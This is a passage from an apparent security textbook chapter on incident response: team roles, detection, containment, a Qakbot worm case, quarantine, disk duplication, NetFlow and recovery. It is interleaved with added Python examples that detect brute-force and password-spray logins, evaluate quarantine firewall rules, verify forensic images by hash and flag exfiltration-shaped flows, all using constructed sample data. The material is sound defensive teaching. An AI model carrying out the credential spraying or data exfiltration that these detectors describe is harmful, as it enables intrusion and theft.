• Network/security analyst
• Internal and external subject matter experts
• Legal counsel
• Public affairs officer
• Security office contact
Tech Tip
Incident Response Team Questions
Well-executed plans are often well tested; when and how often do you test your response plans? How will your team operate undetected in an environment owned by the adversary? Do you have a backup, separate e-mail system that is external to the enterprise solution? Is it encrypted?
In determining the specific makeup of the team for a specific incident, there are some general points to think about. The team needs a leader, preferably a higher-level manager who has the ability to obtain cooperation from employees as needed. It also needs a computer or network security analyst, since the assumption is that the team will be responding to a computer security incident. Specialists may be added to the team for specific hardware or software platforms as needed. The organization’s legal counsel should be part of the team on at least a part-time or as-needed basis. The public affairs office should also be available on an as-needed basis, because it is responsible for formulating the public response should a security incident become public. The organization’s security office should also be kept informed. It should designate a point of contact for the team in case criminal activity is suspected. In this case, care must be taken to preserve evidence should the organization decide to push for prosecution of the individual(s).

This is by no means a complete list, as each organization is different and needs to evaluate what the best mixture is for its own response team. Whatever the decision, the composition of the team, and how and when it will be formed, needs to be clearly addressed in the preparation phase of the incident response policy. To function in a timely and efficient manner, ideally a team has already defined a protocol or set of actions to perform to mitigate the negative effects of most common forms of an incident. One key and often overlooked member of the incident response team is the business. It may be an IT system being investigated, but the data, processes, and value all belong to the business, and the business is the element that understands the risk and value of what is under attack. Having key, knowledgeable business members on the incident response team is a necessity to ensure that the security actions remain aligned with the business goals and objectives of the organization.
Security Measure Implementation
All data that is stored is subject to breach or compromise. Given this assumption, the question becomes, what is the best mitigation strategy to reduce the risk associated with breach or compromise? Data requires protection in each of the three states of the data lifecycle: in storage, in transit, and during processing. The level of risk in each state differs due to several factors:
• Time: Data tends to spend more time in storage, and hence is subject to breach or compromise over longer time periods.
• Quantity: Data in storage tends to offer a greater quantity to breach or compromise than data in transit, and data in processing offers even less. If records are being compromised while being processed, then only records being processed are subjected to risk.
• Access: Different protection mechanisms exist in each of the domains, and this has a direct effect on the risk associated with breach or compromise. Operating systems tend to have very tight controls to prevent cross-process data issues such as error and contamination.
The next aspect of risk during processing is within process access to the data, and a variety of attack techniques address this channel specifically. Data in transit is subject to breach or compromise from a variety of network-level attacks and vulnerabilities. Some of these are under the control of the enterprise, and some are not. One primary mitigation step is data minimization. Data minimization efforts can play a key role in both operational efficiency and security. One of the first rules associated with data is this: Don’t keep what you don’t need. A simple example of this is the case of spam remediation. If spam is separated from e-mail before it hits a mailbox, one can assert that it is not mail and not subject to storage, backup, or data retention issues. As spam can comprise greater than 50 percent of incoming mail, spam remediation can dramatically improve operational efficiency in terms of both speed and cost.

This same principle holds true for other forms of information. When processing credit card transactions, certain data elements are required for the actual transaction, but once the transaction is approved, they have no further business value. Storing of this information provides no business value, yet it does represent a risk in the case of a data breach. Data storage should be governed not by what you can store, but by the business need to store. What is not stored is not subject to breach, and minimizing storage to only what is supported by business need reduces risk and cost to the enterprise. Minimization efforts begin before data even hits a system, let alone a breach. During system design, the appropriate security controls are determined and deployed, with periodic audits to ensure compliance. These controls are based on the sensitivity of the information being protected. One tool that can be used to assist in the selection of controls is a data classification scheme. Not all data is equally important, nor is it equally damaging in the event of loss. Developing and deploying a data classification scheme can assist in preventative planning efforts when designing security for data elements.
Exam Tip: Data breaches may not be preventable, but they can be mitigated through minimization and encryption efforts.
Incident Identification/Detection
An incident is defined as a situation that departs from normal, routine operations. Whether an incident is important or not is the first determination to be made as part of an incident response process. A single failed login is technically an incident, but if it is followed by a correct login, then it is not of any consequence. In fact, this could even be considered as normal. But 10,000 failed attempts on a system, or failures across a large number of accounts, are distinctly different and may be worthy of further investigation.

A key first step is in the processing of information and the determination of whether or not to invoke incident response processes. Incident information can come from a wide range of sources, including logs, employees, help desk calls, system monitoring, security devices, and more. The challenge is to detect that something other than simple common, routine errors is occurring. When evidence accumulates, or in some cases when specific items such as security device logs indicate a potential incident, the next step is to escalate the situation to the incident response team.
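The distinction drawn above between one failed login followed by a success (routine) and bursts of failures or failures spread across many accounts (escalate), worked as an added example that is not the book's own code. The sshd-style log format, the thresholds, and the sample addresses are constructed assumptions; the logic generalizes the text's two cases into a per-source sliding-window check.

```python
"""Triage of failed-login activity from auth-log lines.

Added example, not the book's own code. The log format, the thresholds and
the sample addresses are constructed assumptions; the output is a per-source
list of reasons suitable for an initial-response report.
"""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import NamedTuple

# Assumed format: "<ISO time> sshd[pid]: Failed|Accepted password for [invalid user ]<user> from <src> ..."
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)"
)

# Thresholds are illustrative; a real policy tunes them per system and exposure
WINDOW = timedelta(minutes=10)   # span over which failures are counted
FAIL_BURST = 5                   # failures from one source inside WINDOW
SPRAY_ACCOUNTS = 3               # distinct accounts failed from one source inside WINDOW


class AuthEvent(NamedTuple):
    ts: datetime
    failed: bool
    user: str
    src: str


def parse(lines: list[str]) -> list[AuthEvent]:
    """Extract authentication events; lines that do not match are ignored."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            events.append(AuthEvent(datetime.fromisoformat(m["ts"]),
                                    m["result"] == "Failed", m["user"], m["src"]))
    return events


def triage(lines: list[str]) -> dict[str, list[str]]:
    """Return, per source address, the reasons it should be escalated.

    Sources with no entry are routine (for example one typo followed by a
    correct login). A success after suspicious failures is added as a reason
    because it raises the information criticality of the event.
    """
    by_src: dict[str, list[AuthEvent]] = defaultdict(list)
    for ev in parse(lines):
        by_src[ev.src].append(ev)

    findings: dict[str, list[str]] = {}
    for src, events in by_src.items():
        events.sort(key=lambda e: e.ts)
        fails = [e for e in events if e.failed]
        if not fails:
            continue
        # Slide a WINDOW forward from each failure; keep the worst burst and spread seen
        max_burst = max_spray = 0
        for i, first in enumerate(fails):
            window = [e for e in fails[i:] if e.ts - first.ts <= WINDOW]
            max_burst = max(max_burst, len(window))
            max_spray = max(max_spray, len({e.user for e in window}))
        reasons = []
        if max_burst >= FAIL_BURST:
            reasons.append(f"{max_burst} failures within {WINDOW}")
        if max_spray >= SPRAY_ACCOUNTS:
            reasons.append(f"failures across {max_spray} distinct accounts")
        if reasons and any(not e.failed and e.ts > fails[0].ts for e in events):
            reasons.append("subsequent successful login from this source")
        if reasons:
            findings[src] = reasons
    return findings


# Constructed sample log: one routine typo, one single-account burst, one account spray
SAMPLE_LOG = """\
2016-03-01T09:00:01 sshd[1201]: Failed password for alice from 10.0.0.5 port 51022 ssh2
2016-03-01T09:00:07 sshd[1201]: Accepted password for alice from 10.0.0.5 port 51022 ssh2
2016-03-01T09:10:00 sshd[1310]: Failed password for root from 203.0.113.9 port 40001 ssh2
2016-03-01T09:10:01 sshd[1311]: Failed password for root from 203.0.113.9 port 40002 ssh2
2016-03-01T09:10:02 sshd[1312]: Failed password for root from 203.0.113.9 port 40003 ssh2
2016-03-01T09:10:03 sshd[1313]: Failed password for root from 203.0.113.9 port 40004 ssh2
2016-03-01T09:10:04 sshd[1314]: Failed password for root from 203.0.113.9 port 40005 ssh2
2016-03-01T09:10:05 sshd[1315]: Failed password for root from 203.0.113.9 port 40006 ssh2
2016-03-01T10:00:00 sshd[1400]: Failed password for invalid user backup from 198.51.100.7 port 2200 ssh2
2016-03-01T10:02:00 sshd[1401]: Failed password for bob from 198.51.100.7 port 2201 ssh2
2016-03-01T10:04:00 sshd[1402]: Failed password for carol from 198.51.100.7 port 2202 ssh2
2016-03-01T10:06:00 sshd[1403]: Accepted password for carol from 198.51.100.7 port 2203 ssh2
"""

if __name__ == "__main__":
    for src, reasons in triage(SAMPLE_LOG.splitlines()).items():
        print(src, "->", "; ".join(reasons))
```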
Detection
Of course, an incident response team can’t begin an investigation until a suspected incident has been detected. At that point, the detection phase of the incident response policy kicks in. One of the first jobs of the incident response team is to determine whether an actual security incident has occurred. Many things can be misinterpreted as a possible security incident. For example, a software bug in an application may cause a user to lose a file, and the user may blame this on a virus or similar malicious software. The incident response team must investigate each reported incident and treat it as a potential security incident until it can determine whether it is or isn’t. This means that your organization will want to respond initially with a limited response team before wasting a lot of time having the full team respond. This is the initial step to take when a report is received that a possible incident has been detected.

Security incidents can take a variety of forms, and who discovers the incident will vary as well. One of the groups most likely to discover an incident is the team of network and security administrators who run devices such as the organization’s firewalls and intrusion detection systems. Another common incident is a virus. Several packages are available that can help an organization detect potential virus activity or other malicious code. Administrators will often be the ones to notice something is amiss, but so might an average user who has been hit by the virus. Social engineering is a common technique used by potential intruders to acquire information that may be useful in gaining access to computer systems, networks, or the physical facilities that house them. Anybody in the organization can be the target of a social engineering attack, so all employees need to know what to be looking for regarding this type of attack. In fact, the target might not even be one of your organization’s employees—it could be a contractor, such as somebody on the custodial staff or nighttime security staff. Whatever the type of security incident suspected, and no matter who suspects it, a reporting procedure needs to be in place for the employees to use when an incident is detected. Everybody needs to know who to call should they suspect something, and everybody needs to know what to do. A common technique is to develop a reporting template that can be supplied to an individual who suspects an incident, so that the necessary information is gathered in a timely manner.

Detecting that a security event is occurring or has occurred is not necessarily an easy matter. In certain situations, such as the activation of a malicious payload for a virus or worm that deletes critical files, it will be obvious that an event has occurred. In other situations, such as where an individual has penetrated your system and has been slowly copying critical files without changing or destroying anything, the event may take a lot longer to detect. Often, the first indication that a security event has occurred might be a user or administrator noticing that something is “funny” about the system or its response.
Initial Response
Although there is no such thing as a typical incident, for any incident there is a series of questions that can be answered to form a proper initial response. Regardless of the source, the following items are important to determine during an initial response:
• Current time and date
• Who/what is reporting the incident
• Nature of the incident
• When the incident occurred
• Hardware/software involved
• Point of contact for involved personnel
Tech Tip
Initial Response Errors
Mistakes such as these are common during initial response:
• Failure to document findings appropriately
• Failure to notify or provide accurate information to decision-makers
• Failure to record and control access to digital evidence
• Waiting too long before reporting
• Underestimating the scope of evidence that may be found
The purpose of an initial response is to begin the incident response action and place it on a proper pathway toward success. The initial response must support the goals of the information security program. If something is very critical, treating it as routine would be a mistake, so triage with respect to information criticality is important. The initial response must also be aligned with the business practices and objectives. Triage with respect to current business imperatives and conditions is important. The initial response actions need to be designed to comply with administrative and legal policies as well as to support decisions with regard to civil, administrative, or criminal investigations/actions. For these purposes, maintaining a forensically sound process from the beginning is important. It is also important that the information is delivered accurately and expeditiously to the appropriate decision-makers so that future actions can be timely. One of the greatest tools to achieve all of these goals is a simple and efficient process, so establishing fewer steps that are clear and clean is preferred. Complexity in the initial response process only leads to issues later because of delays, confusion, and incomplete information.
First Responder
A cyber first responder must do as much as possible to control damage or loss of evidence. Obviously, as time passes, evidence can be tampered with or destroyed. Look around on the desk, on the Rolodex, under the keyboard, in desktop storage areas, and on cubicle bulletin boards for any information that might be relevant. Secure floppy disks, optical discs, flash memory cards, USB drives, tapes, and other removable media. Request copies of logs as soon as possible. Most ISPs will protect logs that could be subpoenaed. Take photos (some localities require use of Polaroid photos, as they are more difficult to modify without obvious tampering) or video. Include photos of operating computer screens and hardware components from multiple angles. Be sure to photograph internal components before removing them for analysis. The first responder can do much to prevent damage, or can cause significant loss by digitally altering evidence, even inadvertently. Collecting data should be done in a forensically sound nature (see Chapter 23 for details), and be sure to pay attention to recording time values so time offsets can be calculated.
Tech Tip
Common Technical Errors
Common technical mistakes during initial response include:
• Altering time/date stamps on evidence systems
• “Killing” rogue processes
• Patching the system
• Not recording the steps taken on the system
• Not acting passively
Incident Isolation
Once an incident is discovered and characterized, the most important step in the incident response process involves the isolation of the problem. Many incidents can spread to other machines and expand the damage footprint if not contained by the incident response team. When a particular machine or service becomes compromised, the team can invoke the preplanned steps to isolate the infected unit from others. This may have an impact on performance, but it will still be less than if the compromise is allowed to spread and more machines become compromised.
Containment and Eradication
Once the incident response team has determined that an incident most likely has occurred, it must attempt to quickly contain the problem. At this point, or very soon after containment begins, depending on the severity of the incident, management needs to decide whether the organization intends to prosecute the individual who has caused the incident (in which case collection and preservation of evidence is necessary), or simply wants to restore operations as quickly as possible without regard to possibly destroying evidence. In certain circumstances, management might not have a choice, such as if specific regulations or laws require it to report particular incidents. If management makes the decision to prosecute, specific procedures need to be followed in handling potential evidence. Individuals trained in forensics should be used in this case.
The incident response team must decide how to address containment as soon as it has determined that an actual incident has occurred. If an intruder is still connected to the organization's system, one response is to disconnect from the Internet until the system can be restored and vulnerabilities can be patched. This, however, means that your organization is not accessible to customers over the Internet during that time, which may result in lost revenue. Another response might be to stay connected and attempt to determine the origin of the intruder. A decision will need to be made as to which is more important for your organization. Your incident response policy should identify who is authorized to make this decision.
Other possible containment activities might include adding filtering rules or modifying existing rules on firewalls, routers, and intrusion detection systems, updating antivirus software, and removing specific pieces of hardware or halting specific software applications. If an intruder has gained access through a specific account, disabling or removing that account may also be necessary.
Qakbot Worm Isolation
The following are summary notes made by a firm that was hit by the Qakbot worm. Consider how your incident response process would respond to this scenario.
- Laptop infected while off network
- When rejoined to the company network, spread to open network drives within minutes
- Spread to a group of computers within 60 minutes using a common administrator credential
- Infection identified by server antivirus detecting dropped files
- Malware analysis identified command and control connections
- Identified additional infected systems from network logs
- Could not immediately take infected computers out of service because they were being used in a critical function
- Computers were also geographically dispersed
- Had to isolate a portion of the network (while still allowing critical data flows) while remediating one computer at a time during a maintenance window
Once the immediate problems have been contained, the incident response team needs to address the cause of the incident. If the incident is the result of a vulnerability that was not patched, the patch must be obtained, tested, and applied. Accounts may need to be disabled or passwords may need to be changed. Complete reloading of the operating system might be necessary if the intruder has been in the system for an unknown length of time or has modified system files. Determining when an intruder first gained access to your system or network is critical in determining how far back to go in restoring the system or network.
Quarantine
One method of isolating a machine is through a quarantine process. Quarantine is a process of isolating an object from its surroundings, preventing normal access methods. The machine may be allowed to run, but its connection to other machines is broken in a manner to prevent the spread of infection. Quarantine can be accomplished through a variety of mechanisms, including the erection of firewalls restricting communication between machines. This can be a fairly complex process, but if properly configured in advance, the limitations of the quarantine operation can allow the machine to continue to run for diagnostic purposes, even if it no longer processes a workload.
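The Qakbot notes above and the quarantine description are the same problem stated twice: cut the infected hosts off from everything except the flows the business cannot lose and the access the responders need. The following added example (not from the chapter or from any vendor) encodes that as an ordered, first-match rule set and evaluates candidate flows against it, so the policy can be checked before it is pushed to a firewall or switch ACL. The addresses, ports and quarantine segment are constructed.

```python
"""A first-match quarantine policy and an evaluator to test it before deployment.

Added example, not from the original chapter. It models the Qakbot notes
above: infected workstations must keep talking to one critical application
server, a responder's forensic workstation must reach them for diagnosis,
and all other traffic into or out of the segment is dropped. Addresses and
ports are constructed; the rule shape maps onto any firewall or ACL syntax."""
from ipaddress import ip_address, ip_network
from typing import NamedTuple, Optional


class Flow(NamedTuple):
    src: str
    dst: str
    proto: str    # "tcp" or "udp"
    dport: int


class Rule(NamedTuple):
    action: str            # "allow" or "deny"
    src: str               # CIDR
    dst: str               # CIDR
    proto: Optional[str]   # None matches any protocol
    dport: Optional[int]   # None matches any destination port
    note: str


QUARANTINE = "10.20.0.0/24"    # constructed: segment the infected hosts were moved to
CRITICAL_APP = "10.1.5.10/32"  # constructed: server the critical function depends on
FORENSIC_WS = "10.9.9.5/32"    # constructed: responder workstation

# Specific allows first, then default deny in both directions. Because the
# deny covers quarantine -> anywhere, it also stops host-to-host spread inside
# the segment when the enforcement point sees that traffic.
QUARANTINE_POLICY = [
    Rule("allow", FORENSIC_WS, QUARANTINE, "tcp", 3389, "responder RDP into quarantine"),
    Rule("allow", FORENSIC_WS, QUARANTINE, "tcp", 445, "responder evidence pull over SMB"),
    Rule("allow", QUARANTINE, CRITICAL_APP, "tcp", 443, "critical data flow kept alive"),
    Rule("deny", QUARANTINE, "0.0.0.0/0", None, None, "nothing else leaves quarantine"),
    Rule("deny", "0.0.0.0/0", QUARANTINE, None, None, "nothing else enters quarantine"),
]


def matches(rule: Rule, flow: Flow) -> bool:
    return (ip_address(flow.src) in ip_network(rule.src)
            and ip_address(flow.dst) in ip_network(rule.dst)
            and (rule.proto is None or rule.proto == flow.proto)
            and (rule.dport is None or rule.dport == flow.dport))


def evaluate(policy, flow: Flow) -> str:
    """Action of the first matching rule. Traffic touching neither side of
    the quarantine segment matches no rule and is left alone ("allow")."""
    for rule in policy:
        if matches(rule, flow):
            return rule.action
    return "allow"


def blocked_spread_paths(policy, infected: str, peers) -> list:
    """SMB (445) paths from an infected host that the policy now cuts, i.e.
    the lateral-movement channel the worm used."""
    return [p for p in peers if evaluate(policy, Flow(infected, p, "tcp", 445)) == "deny"]


if __name__ == "__main__":
    for f in [Flow("10.20.0.15", "10.1.5.10", "tcp", 443),
              Flow("10.20.0.15", "198.51.100.23", "tcp", 443),
              Flow("10.9.9.5", "10.20.0.15", "tcp", 3389),
              Flow("10.20.0.15", "10.20.0.16", "tcp", 445)]:
        print(f, "->", evaluate(QUARANTINE_POLICY, f))
```

The ordering is the whole point: the critical-flow allow must precede the outbound deny, and the responder's access must precede the inbound deny, or the quarantine either breaks the business function it was meant to preserve or locks the responders out. Running candidate flows through the evaluator is a cheap way to catch a misordered rule before a maintenance window.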
Device Removal
A more extreme response is device removal. In the event that a machine becomes compromised, it is simply removed from production and replaced. When device removal entails the physical change of hardware, this is a resource-intensive operation. The reimaging of a machine can be a time-consuming and difficult endeavor. The advent of virtual machines changes this entirely, as the provisioning of virtual images on hardware can be accomplished in a much quicker fashion.
Escalation and Notification
One key decision point in initial response is that of escalation. When a threshold of information becomes known to an operator and the operator decides to escalate the situation, the incident response process moves to a notification and escalation phase. Not all incidents are of the same risk profile, and incident response efforts should map to the actual risk level associated with the incident. When the incident response team is notified of a potential incident, its first steps are to confirm the existence, scope, and magnitude of the event and then respond accordingly. This is typically done through a two-step escalation process, where a minimal quick-response team begins and then adds members as necessitated by the issue.
Making an assessment of the risk associated with an incident is an important first step. If the characteristics of an incident include a large number of packets destined for different services on a machine (an attack commonly referred to as a port scan), then the actions needed are different than those needed to respond to a large number of packets destined to a single machine service. Port scans are common, and to a degree relatively harmless, while port flooding can result in denial of service. Making a determination of the specific downstream risks is important in prioritizing response actions.
Strategy Formulation
The response to an incident will be highly dependent upon the particular circumstances of the intrusion. There are many paths one can take in the steps associated with an incident; the challenge is in choosing the best steps in each case. During the preparation stage, a wide range of scenarios can be examined, allowing time to formulate strategies. Even after an incident response team has planned a series of strategies to respond to various scenarios, determining how to employ those preplanned strategies to proper effect still depends on the circumstances of a particular incident. A variety of factors should be considered in the planning and deployment of strategies, including, but not limited to, the following:
- How critical are the impacted systems?
- How sensitive is the data?
- What is the potential overall dollar loss involved/rate of loss?
- How much downtime can be tolerated?
- Who are the perpetrators?
- What is the skill level of the attacker?
- Does the incident have adverse publicity potential?
These pieces of information provide boundaries for the upcoming investigations. There are still numerous issues that need to be determined with respect to the upcoming investigation. Addressing these issues helps provide focal points during the investigation:
- Restore normal operations
  - Offline recovery?
  - Online recovery?
- Determine public relations play
  - "To spin or not to spin?"
- Determine probable attacker
  - Internal: handle internally or prosecute?
  - External: prosecute?
  - Involve law enforcement?
- Determine type of attack
  - DoS, theft, vandalism, policy violation?
  - Ongoing intrusion?
  - Pivoting?
- Classify victim system
  - Critical server/application?
  - Number of users?
  - What other systems are affected?
Tech Tip
Investigation Best Practice
The first rule of incident response investigations is "Do no harm." If the investigation itself causes issues for the business, how is this different from a business perspective than the original attack vector? In fact, in advanced threats, the attackers take great care not to impact the system or business operations in any way that could lead to their discovery. It is important for the response team to exercise extreme caution and to do no harm, lest they make future investigations impractical or deemed to be not worth pursuing.
Using the answers to these questions helps the team determine the necessary steps in the upcoming investigation phase. Although it is impossible to account for all circumstances, this level of strategy can greatly assist in scoping the work ahead during the investigation phase.
Investigation
The true investigation phase of an incident is a multistep, multiparty event. With the exception of very simple events, most incidents will involve multiple machines and potentially impact the business in multiple ways. The primary objective of the investigative phase is to make the following determinations:
- What happened
- What systems are affected
- What was compromised
- What was the vulnerability
- Who did it (if possible to determine)
- What are the recovery/remediation options
Looking at the list, it is daunting, but this is where the real work of incident response occurs. It will take a team effort, partly because of workload, partly because of specialized skills, and partly because the entire effort is being performed in a race against time.
Duplication
Duplication of drives is a common forensics process. It is important to have accurate copies and proper hash values so that any analysis is performed under proper conditions: the hash of the source and the hash of the image must agree, and the analysis is then performed on the image, never on the original. Proper disk duplication is a bit-for-bit copy of the whole medium, so that all data, including file system metadata and the contents of unallocated space, is captured and available for analysis as part of the overall process.
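How duplication and hashing fit together, as an added example that is not part of the chapter: the source is hashed while it streams into the image, the written image is hashed by a separate read, and both hashes and both sizes must agree before analysis starts. A real acquisition reads the physical device through a write blocker; here the "device" is a constructed in-memory byte string so the code runs offline.

```python
"""Forensic duplication of a medium with hash verification.

Added example, not from the original chapter. A real acquisition reads the
physical device (for example /dev/sdb) through a write blocker; here the
"device" is a constructed in-memory byte string so the example runs offline.
The image is written in fixed-size blocks, hashed as it is written, flushed
to disk, and then re-read and hashed independently so the two hashes come
from two different reads of the data."""
import hashlib
import io
import os
import tempfile

BLOCK_SIZE = 4096  # read/write granularity; a real tool would use the sector size or larger


def hash_file(path: str) -> str:
    """SHA-256 of a file, read independently of the copy that wrote it."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(BLOCK_SIZE), b""):
            h.update(block)
    return h.hexdigest()


def image_device(device, image_path: str) -> dict:
    """Copy every byte of the readable `device` into `image_path`.

    The source is hashed as it streams past, the written image is flushed to
    disk and then hashed by a separate read, and both sizes are recorded.
    Returns the acquisition record a responder would write into the notes."""
    src_hash = hashlib.sha256()
    copied = 0
    with open(image_path, "wb") as out:
        for block in iter(lambda: device.read(BLOCK_SIZE), b""):
            src_hash.update(block)
            out.write(block)
            copied += len(block)
        out.flush()
        os.fsync(out.fileno())
    return {
        "source_sha256": src_hash.hexdigest(),
        "image_sha256": hash_file(image_path),
        "bytes_copied": copied,
        "image_bytes": os.path.getsize(image_path),
    }


def verify(record: dict) -> bool:
    """An image is fit for analysis only if both hashes and both sizes agree."""
    return (record["source_sha256"] == record["image_sha256"]
            and record["bytes_copied"] == record["image_bytes"])


def demo() -> dict:
    """Acquire a constructed 12,345-byte 'device' (not a real disk) and
    verify it; then alter one byte of the image to show the hash catches it."""
    # 12,288 bytes of a repeating pattern plus a short tail so the last block is partial.
    fake_device = io.BytesIO(bytes(range(256)) * 48 + b"slack" + b"\x00" * 52)
    with tempfile.TemporaryDirectory() as tmp:
        image_path = os.path.join(tmp, "evidence.dd")
        record = image_device(fake_device, image_path)
        record["verified"] = verify(record)
        with open(image_path, "r+b") as f:      # simulated post-acquisition tampering
            f.seek(100)
            f.write(b"\xff")                    # original byte at this offset is 0x64
        record["tamper_detected"] = hash_file(image_path) != record["image_sha256"]
    return record


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The second, independent read of the image is deliberate: hashing only the bytes in memory would verify the copy logic but not what actually landed on the evidence drive. The recorded hashes are what later lets an examiner, or opposing counsel, confirm that the image analysed is the one acquired.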
Network Monitoring
To monitor network flow data, including who is talking to whom, one source of information is NetFlow data. NetFlow is a protocol/standard for the collection of network metadata on the flows of network traffic. NetFlow originated at Cisco; its version 9 format is the basis of the IETF standard IPFIX (IP Flow Information Export), and both record unidirectional communication metadata rather than packet contents. NetFlow can identify both common and unique data flows, and in the case of incident response, typically the new and unique NetFlow patterns are of most interest to incident responders.
Tech Tip
NetFlow Data
A flow is unidirectional, so a bidirectional exchange would be recorded as two separate flows. A NetFlow flow is defined by seven unique keys:
1. Source IP address
2. Destination IP address
3. Source port
4. Destination port
5. Layer 3 protocol
6. TOS byte (DSCP)
7. Input interface (ifIndex)
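An added example (not from the chapter) of working with the seven keys above: records are aggregated per key, the two unidirectional flows of each inside-to-outside conversation are joined to compare bytes out against bytes in, and flows from an incident window are compared against a baseline to surface the new talkers the text says responders care most about. The flow lines are a constructed text form rather than binary exporter output, and the internal address ranges are an assumed address plan.

```python
"""Keying, pairing and baselining flow records.

Added example, not from the original chapter. The flow lines are a
constructed text form ("src,dst,sport,dport,proto,tos,ifindex,bytes", one
unidirectional flow per line); real exporters send binary NetFlow v5/v9 or
IPFIX records, but the seven-key grouping is the same. The internal address
ranges are an assumed address plan for the illustration."""
from collections import Counter, defaultdict
from ipaddress import ip_address, ip_network
from typing import NamedTuple


class FlowKey(NamedTuple):
    src_ip: str
    dst_ip: str
    src_port: int
    dst_port: int
    proto: int       # layer 3 protocol number: 6 = TCP, 17 = UDP
    tos: int         # TOS byte / DSCP
    if_index: int    # input interface (ifIndex)


INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
                 ip_network("192.168.0.0/16")]  # assumed enterprise address plan

# Constructed records: a normal day ...
BASELINE = [
    "10.0.0.7,10.1.5.10,51022,443,6,0,1,8400",
    "10.1.5.10,10.0.0.7,443,51022,6,0,2,120300",
    "10.0.0.7,10.0.0.53,40111,53,17,0,1,78",
    "10.0.0.53,10.0.0.7,53,40111,17,0,2,164",
]
# ... and the incident window, with two conversations never seen before.
INCIDENT = BASELINE + [
    "10.0.0.7,198.51.100.23,49201,443,6,0,1,2200000",   # large upload to an outside host
    "198.51.100.23,10.0.0.7,443,49201,6,0,2,9000",
    "10.0.0.7,10.0.0.22,49300,445,6,0,1,51000",          # SMB to a peer workstation
]


def parse_flow(line: str):
    f = line.strip().split(",")
    key = FlowKey(f[0], f[1], int(f[2]), int(f[3]), int(f[4]), int(f[5]), int(f[6]))
    return key, int(f[7])


def aggregate(lines) -> Counter:
    """Total bytes per seven-key tuple, which is how a collector stores flows."""
    totals = Counter()
    for line in lines:
        key, nbytes = parse_flow(line)
        totals[key] += nbytes
    return totals


def is_internal(ip: str) -> bool:
    return any(ip_address(ip) in net for net in INTERNAL_NETS)


def internal_external_volumes(totals):
    """Join the two unidirectional flows of each internal<->external
    conversation into bytes out and bytes in, keyed by (internal, external)."""
    vols = defaultdict(lambda: {"out": 0, "in": 0})
    for key, nbytes in totals.items():
        if is_internal(key.src_ip) and not is_internal(key.dst_ip):
            vols[(key.src_ip, key.dst_ip)]["out"] += nbytes
        elif is_internal(key.dst_ip) and not is_internal(key.src_ip):
            vols[(key.dst_ip, key.src_ip)]["in"] += nbytes
    return dict(vols)


def outbound_heavy(vols, ratio: int = 10):
    """Conversations where the inside host sends `ratio` times more than it
    receives: the shape of exfiltration rather than browsing."""
    return sorted(pair for pair, v in vols.items() if v["out"] > ratio * v["in"])


def new_flows(baseline_lines, incident_lines):
    """Talker tuples present in the incident window but absent from the baseline.
    The initiating side's ephemeral port churns, so the comparison key is
    (src_ip, dst_ip, dst_port, proto) rather than the full seven keys."""
    def talkers(lines):
        return {(k.src_ip, k.dst_ip, k.dst_port, k.proto) for k, _ in map(parse_flow, lines)}
    return sorted(talkers(incident_lines) - talkers(baseline_lines))


if __name__ == "__main__":
    print("new talkers:", new_flows(BASELINE, INCIDENT))
    print("outbound-heavy:", outbound_heavy(internal_external_volumes(aggregate(INCIDENT))))
```

The baseline comparison surfaces both the connection to the outside host and the SMB session to a peer workstation, which is the lateral-movement channel in the Qakbot notes; the byte-ratio check then separates the outside connection from ordinary HTTPS browsing, where the inside host receives far more than it sends.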
Recovery/Reconstitution Procedures
Recovery is an important step in all incidents. One of the first rules is to not trust a system that has been compromised, and this includes all aspects of an operating system. Whether there is known destruction or not, the safe path is one where the recovery step includes reconstruction of affected machines. Recovery efforts from an incident involve several specific elements. First, the cause of the incident needs to be determined and resolved. This is done through an incident response mechanism. Attempting to recover before the cause is known and corrected will commonly result in a continuation of the problem. Second, the data, if sensitive and subject to misuse, needs to be examined in the context of how it was lost, who would have access, and what business measures need to be taken to mitigate specific business damage as a result of the release. This may involve the changing of business plans if the release makes them suspect or subject to adverse impacts.
A key aspect in many incidents is that of external communications. Having a communications expert who is familiar with dealing with the press and has the language nuances necessary to convey the correct information and not inflame the situation is essential to the success of any communication plan. Many firms attempt to use their legal counsel for this, but generally speaking, the legally precise language used by an attorney is not useful from a PR standpoint, and a more nuanced communicator may provide a better image. In many cases of crisis management, it is not the crisis that determines the final costs, but the reaction to and communication of details after the initial crisis.
Recovery can be a two-step process. First, the essential business functions can be recovered, enabling business operations to resume. The second step is the complete restoration of all services and operations. Because of the difficulty and uncertainty involved in repairing systems, most best practices today involve reconstituting the underlying system and then transferring the operational data. Staging the recovery operations in a prioritized fashion allows a graceful return to an operating condition.
Restoration can be done in a wide variety of ways. For many systems, the reconstitution of a clean operating system can restore a system. This type of restoration requires a significant amount of preparation. Having a clean version of each of your assets provides for this type of restoration effort. Recovery sounds simple, but in large-scale incidents, the number of machines can be significant. Add to this the chance of reinfection as machines are restored. This means that simply replacing the machine with a clean machine is not sufficient, but rather the replacement needs protection against reinfection.
The other challenge in large-scale recovery events is the sequencing of the effort. When there are many machines to be restored, and the restoration process takes time and resources, scheduling is essential. Setting up a prioritized schedule is one of the steps that needs to be considered in the planning process. The time to do this type of planning is before the hectic pace of an incident occurs.
Reporting
After the system has been restored, the incident response team creates a report of the incident. Detailing what was discovered, how it was discovered, what was done, and the results, this report acts as a corporate memory and can be used for future incidents. Having a knowledge base of previous incidents and the actions used is a valuable resource because it is in the context of the particular enterprise. These reports also allow a mechanism to close the loop with management over the incident and, most importantly, provide a roadmap of the actions that can be used in the future to prevent events of identical or similar nature.
Part of the report will be recommendations, if appropriate, to change existing policies and procedures, including disaster recovery and business continuity. The similarity in objectives makes a natural overlap, and the cross-pollination between these operations is important to make all processes as efficient as possible.
Follow-up/Lessons Learned
